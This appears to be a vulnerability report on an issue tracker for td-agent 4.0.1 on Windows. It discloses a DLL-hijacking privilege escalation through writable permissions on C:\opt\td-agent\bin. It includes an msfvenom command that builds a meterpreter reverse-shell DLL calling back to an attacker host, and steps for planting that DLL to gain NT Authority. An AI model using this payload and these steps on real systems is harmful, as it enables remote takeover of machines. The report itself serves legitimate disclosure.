Description
POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges' on Windows
To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin
Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority.
Expected behavior
N/A
Your Environment
Windows10
If you hit the problem with older fluentd version, try latest version first.
Your Configuration
Default
Your Error Log
No errors.
Additional context
Please add an appropriate contact method to submit possible vulnerabilities and POC's.